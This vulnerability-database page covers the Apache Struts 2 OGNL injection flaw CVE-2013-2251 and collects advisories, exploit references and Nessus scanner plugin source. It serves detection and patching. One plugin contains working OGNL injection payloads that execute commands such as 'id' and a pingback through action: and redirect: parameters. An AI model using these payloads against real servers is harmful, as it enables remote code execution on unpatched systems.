Vulnerabilities > CVE-2013-2251 - Injection vulnerability in multiple products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
apache
fujitsu
oracle
CWE-74
critical
nessus
exploit available
metasploit

Summary

Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

Vulnerable Configurations

Part Description Count
Application
Apache
61
Application
Fujitsu
2
Application
Oracle
3
OS
Microsoft
3
OS
Redhat
1
OS
Oracle
1
OS
Fujitsu
6
Hardware
Fujitsu
6

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Server Side Include (SSI) Injection
    An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.

Exploit-Db

  • descriptionApache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection. CVE-2013-2251. Webapps exploit for Multiple platform
    idEDB-ID:44583
    last seen2018-05-24
    modified2014-01-14
    published2014-01-14
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/44583/
    titleApache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
  • descriptionApache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution. CVE-2013-2251. Remote exploits for multiple platform
    idEDB-ID:27135
    last seen2016-02-03
    modified2013-07-27
    published2013-07-27
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/27135/
    titleApache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution

Metasploit

descriptionThe Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
idMSF:EXPLOIT/MULTI/HTTP/STRUTS_DEFAULT_ACTION_MAPPER
last seen2020-06-05
modified2019-08-02
published2013-07-24
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts_default_action_mapper.rb
titleApache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution

Nessus

  • NASL familyCGI abuses
    NASL idSTRUTS_2_3_15_1_COMMAND_EXECUTION.NASL
    descriptionThe remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression prefixed by the
    last seen2020-06-01
    modified2020-06-02
    plugin id68981
    published2013-07-19
    reporterThis script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/68981
    titleApache Struts 2 'action:' Parameter Arbitrary Remote Command Execution
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(68981);
      script_version("1.31");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
    
      script_cve_id("CVE-2013-2251");
      script_bugtraq_id(61189);
    
      script_name(english:"Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution");
      script_summary(english:"Attempts to execute arbitrary commands.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a web application that uses a Java
    framework, which is affected by a remote command execution
    vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The remote web application appears to use Struts 2, a web framework
    that utilizes OGNL (Object-Graph Navigation Language) as an expression
    language. Due to a flaw in the evaluation of an OGNL expression
    prefixed by the 'action:' parameter, a remote, unauthenticated
    attacker can exploit this issue to execute arbitrary commands on the
    remote web server. An attacker can exploit the issue by sending a
    specially crafted HTTP request to the remote web server.
    
    Note that the 'redirect:' and 'redirectAction' parameters are also
    reportedly affected by the command execution vulnerability.
    Additionally, this version of Struts 2 is also reportedly affected by
    an open redirect vulnerability; however, Nessus has not tested for
    this additional issue.
    
    Note also that this plugin will only report the first vulnerable
    instance of a Struts 2 application.
    
    Finally, note that Apache Archiva versions prior to and equal to
    1.3.6 are also affected by this issue as the application utilizes a
    vulnerable version of Struts 2.");
      script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/527977/30/0/threaded");
      script_set_attribute(attribute:"see_also", value:"http://cxsecurity.com/issue/WLB-2014010087");
      script_set_attribute(attribute:"see_also", value:"http://struts.apache.org/docs/s2-016.html");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to version 2.3.15.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-2251");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/16");
      script_set_attribute(attribute:"patch_publication_date", value:"2013/07/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/19");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("http_version.nasl", "webmirror.nasl", "os_fingerprint.nasl");
      script_require_ports("Services/www", 80, 8080);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("http.inc");
    include("misc_func.inc");
    include("torture_cgi.inc");
    include("url_func.inc");
    
    port = get_http_port(default:8080);
    cgis = get_kb_list('www/' + port + '/cgi');
    
    urls = make_list();
    # To identify actions that we can test the exploit on we will look
    # for files with the .action / .jsp / .do suffix from the KB.
    if (!isnull(cgis))
    {
      foreach cgi (cgis)
      {
        match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
        if (match)
        {
          urls = make_list(urls, match[0]);
          if (!thorough_tests) break;
        }
        match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
        if (!isnull(match2))
        {
          urls = make_list(urls, match2[0]);
          if (!thorough_tests) break;
        }
        match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
        if (!isnull(match3))
        {
          urls = make_list(urls, match3[0]);
          if (!thorough_tests) break;
        }
        if (cgi =~ "struts2?(-rest)?-showcase")
        {
          urls = make_list(urls, cgi);
          if (!thorough_tests) break;
        }
      }
    }
    if (thorough_tests)
    {
      cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
      if (!isnull(cgi2)) urls = make_list(urls, cgi2);
    
      cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
      if (!isnull(cgi3)) urls = make_list(urls, cgi3);
    
      cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
      if (!isnull(cgi4)) urls = make_list(urls, cgi4);
    }
    
    # Always check web root
    urls = make_list(urls, "/");
    
    # Struts is slow
    timeout = get_read_timeout() * 2;
    if(timeout < 10)
      timeout = 10;
    http_set_read_timeout(timeout);
    
    urls = list_uniq(urls);
    
    # Determine which command to execute on target host
    os = get_kb_item("Host/OS");
    if (os && report_paranoia < 2)
    {
      if ("Windows" >< os) cmd = 'ipconfig';
      else cmd = 'id';
    
      cmds = make_list(cmd);
    }
    else cmds = make_list('id', 'ipconfig');
    
    vuln = FALSE;
    
    foreach url (urls)
    {
      foreach cmd (cmds)
      {
        vuln_url = url + "?action:%25{(new+java.lang.ProcessBuilder(new" +
          "+java.lang.String[]{'" +cmd+ "'})).start()}";
    
        res = http_send_recv3(
          method : "GET",
          port   : port,
          item   : vuln_url,
          fetch404     : TRUE,
          exit_on_fail : TRUE
        );
    
        if (
           res[0] =~ "404 Not Found" &&
           res[2] =~ "\<b\>message\</b\> \<u\>(.*)/java\.lang\." +
             "(UNIX)?Process(Impl)?@(.+)\.jsp\</u\>"
        )
        {
          vuln = TRUE;
          break;
        }
      }
      # Stop after first vulnerable Struts app is found
      if (vuln) break;
    }
    
    # Alternate attack that does not rely on 404 Error Page from Tomcat/JBoss
    # This attack uses the redirect: Parameter
    if (!vuln)
    {
      time = unixtime();
      foreach url (urls)
      {
        vuln_url = url +"?redirect:${%23req%3d%23context.get('com.opensymphony" +
          ".xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.get" +
          "Session().getServletContext().getRealPath('/'),%23resp%3d%23context." +
          "get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')." +
          "getWriter(),%23resp.print('At%20" +time+ "%20Nessus%20found%20the" +
          "%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush()," +
          "%23resp.close()}";
    
        res = http_send_recv3(
          method : "GET",
          port   : port,
          item   : vuln_url,
          exit_on_fail : TRUE
        );
    
        if (
           (res[0] =~ "200 OK") &&
           (res[2] =~ '^At '+time+' Nessus found the path is ([a-zA-Z]:\\\\|/)(.*)')
        )
        {
          vuln = TRUE;
          break;
        }
        if (vuln) break;
      }
    }
    
    # try pingback.
    if(!vuln)
    {
    
      scanner_ip = compat::this_host();
      target_ip = get_host_ip();
    
      ua = get_kb_item("global_settings/http_user_agent");
      if (empty_or_null(ua))
        ua = 'Nessus';
    
      pat = hexstr(rand_str(length:10));
    
      if (!empty_or_null(os) && "windows" >< tolower(os))
      {
        ping_cmd = "ping%20-n%203%20-l%20500%20" + scanner_ip;
        filter = "icmp and icmp[0] = 8 and src host " + target_ip + " and greater 500";
      }
      else
      {
        ping_cmd = "ping%20-c%203%20-p" + pat + "%20" + scanner_ip;
        filter = "icmp and icmp[0] = 8 and src host " + target_ip;
      }
    
      payload_ping = "?redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution" +
        "%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28" +
        "%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28" +
        "%23_memberAccess%2ctrue%29%[email protected]@toString%28" +
        "@java.lang.Runtime@getRuntime%28%29.exec%28%27" + ping_cmd + 
        "%27%29.getInputStream%28%29%29%7d";
    
      foreach url (urls)
      {
        soc = open_sock_tcp(port);
        if (!soc) audit(AUDIT_SOCK_FAIL, port);
    
        attack_url = url + payload_ping;
    
        req =
          'GET ' + attack_url + ' HTTP/1.1\n' +
          'Host: ' + target_ip + ':' + port + '\n' +
          'User-Agent: ' + ua + '\n' +
          '\n';
    
        s = send_capture(socket:soc,data:req,pcap_filter:filter);
        icmp = tolower(hexstr(get_icmp_element(icmp:s,element:"data")));
        close(soc);
    
        if ("windows" >< tolower(os) && !isnull(icmp))
        {
          vuln = TRUE;
          vuln_url = req;
          break;
        }
        else if (pat >< icmp)
        {
          vuln = TRUE;
          vuln_url = req;
          break;
        }
      }
    }
    
    # and finally, we try a simple injection of an ognl add.
    if(!vuln)
    {
      foreach url (urls)
      {  
        payload_ognl_add = "?redirect:%24%7B57550614%2b16044095%7D";
        payload_redirect_verify_regex = "Location: .*73594709";
        
        attack_url = url + payload_ognl_add;
    
        res = http_send_recv3(
          method       : "GET",
          item         : attack_url,
          port         : port,
          exit_on_fail : TRUE,
          follow_redirect: 0
        );
    
        if (res[1] =~ payload_redirect_verify_regex)
        {
          vuln = TRUE;
          vuln_url = attack_url;
          break;
        }
    
        # Stop after first vulnerable Struts app is found
        if (vuln) break;
        }
    }
    
    if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');
    
    security_report_v4(
      port       : port,
      severity   : SECURITY_HOLE,
      generic    : TRUE,
      request    : make_list(build_url(qs:vuln_url, port:port)),
      output     : chomp(res[2])
    );
    
  • NASL familyMisc.
    NASL idSTRUTS_2_3_15_1.NASL
    descriptionThe version of Apache Struts running on the remote host is 2.x prior to 2.3.15.1. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and an open redirect vulnerability. Note that Nessus has not tested for these issues but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id117362
    published2018-09-10
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/117362
    titleApache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(117362);
      script_version("1.11");
      script_cvs_date("Date: 2019/11/05");
    
      script_cve_id("CVE-2013-2248", "CVE-2013-2251");
      script_bugtraq_id(61189, 61196);
    
      script_name(english:"Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)");
      script_summary(english:"Checks the Struts 2 version.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A web application running on the remote host uses a Java framework
    that is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Apache Struts running on the remote host is 2.x
    prior to 2.3.15.1. It, therefore, is affected by multiple
    vulnerabilities including a remote command execution vulnerability
    and an open redirect vulnerability.
    
    Note that Nessus has not tested for these issues but has instead
    relied only on the application's self-reported version number.");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-016");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-017");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Apache Struts version 2.3.15.1 or later");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-2251");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
      script_set_attribute(attribute:"agent", value:"all");
    
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/09");
      script_set_attribute(attribute:"patch_publication_date", value:"2013/07/09");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/09/10");
    
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"combined");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin");
      script_require_keys("Settings/ParanoidReport");
      script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts");
    
      exit(0);
    }
    
    include("vcf.inc");
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    
    app_info = vcf::combined_get_app_info(app:"Apache Struts");
    
    vcf::check_granularity(app_info:app_info, sig_segments:3);
    
    constraints = [
      { "min_version" : "2.0.0", "max_version" : "2.3.15", "fixed_version" : "2.3.15.1" }
    ];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
    
  • NASL familyCGI abuses
    NASL idMYSQL_ENTERPRISE_MONITOR_2_3_14.NASL
    descriptionAccording to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the multiple vulnerabilities in the bundled version of Apache Struts : - Input validation errors exist that allows the execution of arbitrary Object-Graph Navigation Language (OGNL) expressions via specially crafted parameters to the DefaultActionMapper. (CVE-2013-2251) - Multiple unspecified vulnerabilities exist related to dynamic method invocation being enabled by default. (CVE-2013-4316)
    last seen2020-06-01
    modified2020-06-02
    plugin id83292
    published2015-05-08
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/83292
    titleMySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(83292);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/22");
    
      script_cve_id("CVE-2013-2251", "CVE-2013-4316");
      script_bugtraq_id(61189, 62587);
      script_xref(name:"EDB-ID", value:"27135");
    
      script_name(english:"MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities");
      script_summary(english:"Checks the version of MySQL Enterprise Monitor.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A web application running on the remote host is affected by multiple
    vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its self-reported version, the MySQL Enterprise Monitor
    running on the remote host is affected by the multiple vulnerabilities
    in the bundled version of Apache Struts :
    
      - Input validation errors exist that allows the execution
        of arbitrary Object-Graph Navigation Language (OGNL)
        expressions via specially crafted parameters to the
        DefaultActionMapper. (CVE-2013-2251)
    
      - Multiple unspecified vulnerabilities exist related to
        dynamic method invocation being enabled by default.
        (CVE-2013-4316)");
      # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?17c46362");
      # http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ac29c174");
      script_set_attribute(attribute:"see_also", value:"https://struts.apache.org/docs/s2-016.html");
      script_set_attribute(attribute:"see_also", value:"https://struts.apache.org/docs/s2-019.html");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to MySQL Enterprise Monitor 2.3.14 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/16");
      script_set_attribute(attribute:"patch_publication_date", value:"2013/09/09");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/05/08");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:mysql:enterprise_monitor");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("mysql_enterprise_monitor_web_detect.nasl");
      script_require_keys("installed_sw/MySQL Enterprise Monitor");
      script_require_ports("Services/www", 18080);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    
    app  = "MySQL Enterprise Monitor";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    fix  = "2.3.14";
    port = get_http_port(default:18080);
    
    install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);
    version = install['version'];
    install_url = build_url(port:port, qs:"/");
    
    if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)
    {
      if (report_verbosity > 0)
      {
        report =
          '\n  URL               : ' + install_url +
          '\n  Installed version : ' + version +
          '\n  Fixed version     : ' + fix +
          '\n';
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);
    
  • NASL familyCGI abuses
    NASL idARCHIVA_1_3_8.NASL
    descriptionAccording to its self-reported version, the instance of Apache Archiva hosted on the remote web server is 1.2.x prior than or equal to 1.2.2 or 1.3.x prior than or equal to 1.3.6 and thus is affected by the following vulnerabilities : - An input validation error exists related to unspecified scripts and unspecified parameters that could allow cross-site scripting attacks. (CVE-2013-2187) - Input validation errors exist related to the bundled version of Apache Struts that could allow arbitrary Object-Graph Navigation Language (OGNL) expression execution via specially crafted requests. (CVE-2013-2251)
    last seen2020-06-01
    modified2020-06-02
    plugin id73761
    published2014-04-29
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73761
    titleApache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(73761);
      script_version("1.9");
      script_cvs_date("Date: 2019/11/26");
    
      script_cve_id("CVE-2013-2187", "CVE-2013-2251");
      script_bugtraq_id(61189, 66991, 66998);
      script_xref(name:"EDB-ID", value:"27135");
    
      script_name(english:"Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities");
      script_summary(english:"Checks Archiva version");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server hosts an application that is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its self-reported version, the instance of Apache Archiva
    hosted on the remote web server is 1.2.x prior than or equal to 1.2.2
    or 1.3.x prior than or equal to 1.3.6 and thus is affected by the
    following vulnerabilities :
    
      - An input validation error exists related to
        unspecified scripts and unspecified parameters that
        could allow cross-site scripting attacks.
        (CVE-2013-2187)
    
      - Input validation errors exist related to the bundled
        version of Apache Struts that could allow arbitrary
        Object-Graph Navigation Language (OGNL) expression
        execution via specially crafted requests.
        (CVE-2013-2251)");
      script_set_attribute(attribute:"see_also", value:"http://archiva.apache.org/security.html");
      script_set_attribute(attribute:"see_also", value:"http://commons.apache.org/proper/commons-ognl/");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Apache Archiva 1.3.8 / 2.0.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
      script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/16");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/04/18");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/04/29");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:archiva");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("archiva_detect.nasl");
      script_require_keys("www/archiva");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 8080);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    
    port = get_http_port(default:8080, embedded:FALSE);
    
    install = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE);
    dir = install['dir'];
    install_url = build_url(port:port, qs:dir+'/index.action');
    version = install['ver'];
    
    if (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, "Apache Archiva", install_url);
    
    if (version !~ "^1\.[23]($|\.)") audit(AUDIT_WEB_APP_NOT_INST, "Apache Archiva 1.2.x / 1.3.x", port);
    
    # Affected (per NVD) :
    # 1.2.x <= 1.2.2
    # 1.3.x <= 1.3.6
    # Fixed (per vendor) :
    # 1.3.8
    # 2.0.1
    if (
      version =~ "^1\.2($|[^0-9.])" ||
      version =~ "^1\.2\.[012]($|[^0-9])" ||
      version =~ "^1\.3($|[^0-9.])" ||
      version =~ "^1\.3\.[0-6]($|[^0-9])"
    )
    {
      set_kb_item(name:'www/'+port+'/XSS', value:TRUE);
      if (report_verbosity > 0)
      {
        report =
          '\n  URL               : ' + install_url +
          '\n  Installed version : ' + version +
          '\n  Fixed version     : 1.3.8 / 2.0.1' +
          '\n';
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Apache Archiva", install_url, version);
    

Packetstorm

Saint

bid61189
descriptionApache Struts DefaultActionMapper redirect Prefix Vulnerability
osvdb95405
titlestruts_defaultactionmapper_redirect_prefix
typeremote

Seebug

bulletinFamilyexploit
descriptionCVE-2013-2251 Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物 Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令 redirect:和redirectAction:此两项前缀为Struts默认开启功能,目前Struts 2.3.15.1以下版本均存在此漏洞 目前Apache Struts2已经在2.3.15.1中修补了这一漏洞。强烈建议Apache Struts2用户检查您是否受此问题影响,并尽快升级到最新版本 0 Apache Struts 2.0.0 - Apache Struts 2.3.15 厂商状态: ========== 厂商已经发布Apache Struts 2.3.15.1以修复此安全漏洞,建议Struts用户及时升级到最新版本。 厂商安全公告:S2-016 链接:http://struts.apache.org/release/2.3.x/docs/s2-016.html 软件升级页面:http://struts.apache.org/download.cgi#struts23151
idSSV:60906
last seen2017-11-19
modified2013-07-17
published2013-07-17
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-60906
titleApache Struts2 多个前缀参数远程命令执行漏洞(CVE-2013-2251)

References